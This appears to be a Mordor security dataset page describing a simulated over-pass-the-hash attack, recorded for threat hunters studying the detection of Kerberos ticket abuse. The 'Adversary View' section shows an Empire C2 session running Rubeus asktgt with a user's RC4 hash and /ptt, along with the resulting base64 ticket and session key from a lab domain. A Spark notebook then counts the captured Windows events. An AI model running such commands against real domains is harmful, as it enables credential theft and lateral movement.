Rubeus Userland ASKTGT PTT

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/03/19

Modification Date

2020/09/21

Tactics

[‘TA0006’]

Techniques

[‘T1003.003’]

Tags

[‘Over-Pass-The-Hash’, ‘Not Touching LSASS’]

Dataset Description

This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

shell

Mordor shire

binary

asktgt

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
4EH9PC5S ps 172.18.39.6     WORKSTATION6      *THESHIRE\wardog        powershell         5056   5/0.0    2020-09-22 02:12:12  http            

(Empire: agents) > interact 4EH9PC5S
(Empire: 4EH9PC5S) > 
(Empire: 4EH9PC5S) > shell C:\users\sbeavers\Desktop\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /ptt
[*] Tasked 4EH9PC5S to run TASK_SHELL
[*] Agent 4EH9PC5S tasked with task ID 2
(Empire: 4EH9PC5S) > 
______        _                      
  (_____ \      | |                     
  _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0 

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8
[*] Building AS-REQ (w/ preauth) for: 'theshire.local\pgustavo'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw
      IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr
      SCmXhrxOqig5LjU/zlOxxj72iV0Io1vDNrnEHqq0hTNheiEb2Oz3yOEk3Ct6qioIJmjm/PE+MoazpfNa
      DOQUkxLNyEti0ltIyI2I2docI0yIbXA8BNRrGojFdruBcOs5NdDfi2Ttsng+NcZzWmCH4D3amx7AjOMr
      jRotAieTg98Uzt3AG03bQSlPNkLJCW/Pnz5YCE8I8zIrkkGH+mTA+mGg4cNeVJE38nOlShq0meRMKKxC
      drFfzsCgJ64r9dVBP+LmegRcUbrPLv6d2UHc+k0ELbhhfHgiy5m06UaLfrAe8fiUcHsdN0cJ1+4f9KCL
      NsbjXJN85QQGzdOFFjJ07hir+SZ1UU+0NSaOkbFHz178KMk2P/9yWT9UqTEHV2qXuHS4scCV5SQirH6b
      HAWlEpqeEwh+yGUmhLGs8Jo9sBsNEQ6EdFUzA+JjD4itQa4IMgLSLNEwzkZOle85Jbw4kDFsFmtckKVu
      1osdI7dxA9wM/dZElOVUiI2cYqbI+pOcyPJHuzhbYnVhUhKFi29ZxPe1an0T7tNoy1zCFSs0z3V5RKwZ
      4eUVQVxYGspUbB4h21/zEbus+NGTzWtJMqb6L4abOj1iLiRgJagyFKk5h91fasaRUoVAo3VxiIbrPqfh
      kH393T/SC9ZObPESkBY8FVvhs/kuqRZIIhflbdYsTdcp0sa/F7Mo90CREIhH3EqgIQ/e97eK1Z9fr3Ma
      HGfFBEEYcHIm28FQU3gtyMFTSp9gswbq3YtsOMGF5oLY8Po6vAdhHV2wStV9FDPVPepT4USsZGYZ567p
      40PiSGBRUmCevWqrIA5kNwKD8QvaefXrGLZ+oXes9dt3CqHENQ4pJN67gUZq/F5tfFWYwDkefjNWMOwY
      lIAEvyxrxlnA8ouBkvkLSkz4jYMjUCstdJ7TiF/GMboXAX1kfQpv01sMV/39RdSaE4s6aTGlqX2vDShM
      OSdwfSS4qTU8kTkWuKgUh/Fcs2jYbjKfDvOqfkY5fAf+JSPRwqBC4mhsoGDLd3XGFba7prlV0VopSymj
      //ZpVE70a2VJazJHuHoS1ZWvNVILQwF0FteGc5UYQHPMlAC7v6Qr360g8mHv9PG6AS7dHb3WWnezaRV7
      ByPSxZ2B/WHEYWROuXlAK+dKWKWU31/NK6rX8l4Re8OUeu4/lGoEwZikKWxs+jE1zSOww46iZA78zJ3u
      QVeK8t90Z28pxwRX8mo2/PfnOEFwVJMsrBSiwLrLFDbjGqCX8ktaZ1ZTxcXLYu8mfDvCs9KAUMRvncBH
      g5yHUuoX6dIAY6EhWmpeSmqwV5VCV1kUarhKJt+JTC3Yjg9FaPGkJlJae6OB3DCB2aADAgEAooHRBIHO
      fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEGTttXVs0y3nHHWU3quEoDChEBsOVEhFU0hJUkUuTE9D
      QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAyMzkxM1qmERgPMjAy
      MDA5MjIxMjM5MTNapxEYDzIwMjAwOTI5MDIzOTEzWqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa
      MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=
[+] Ticket successfully imported!

  ServiceName           :  krbtgt/theshire.local
  ServiceRealm          :  THESHIRE.LOCAL
  UserName              :  pgustavo
  UserRealm             :  THESHIRE.LOCAL
  StartTime             :  9/21/2020 10:39:13 PM
  EndTime               :  9/22/2020 8:39:13 AM
  RenewTill             :  9/28/2020 10:39:13 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  ZO21dWzTLeccdZTeq4SgMA==

..Command execution completed.

(Empire: 4EH9PC5S) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_shell_rubeus_asktgt_ptt.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION6               |Windows PowerShell                      |800    |165  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |157  |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |141  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |135  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |129  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |67   |
|MORDORDC.theshire.local    |Security                                |5158   |40   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |35   |
|MORDORDC.theshire.local    |Security                                |5156   |33   |
|WORKSTATION5.theshire.local|security                                |5158   |30   |
|WORKSTATION6.theshire.local|security                                |5158   |28   |
|WORKSTATION6.theshire.local|security                                |4658   |28   |
|MORDORDC.theshire.local    |Security                                |4658   |16   |
|WORKSTATION6.theshire.local|security                                |5156   |16   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |16   |
|WORKSTATION6.theshire.local|security                                |4690   |14   |
|WORKSTATION6.theshire.local|security                                |4656   |14   |
|WORKSTATION5.theshire.local|security                                |5156   |10   |
|MORDORDC.theshire.local    |Security                                |4634   |8    |
|MORDORDC.theshire.local    |Security                                |4656   |8    |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows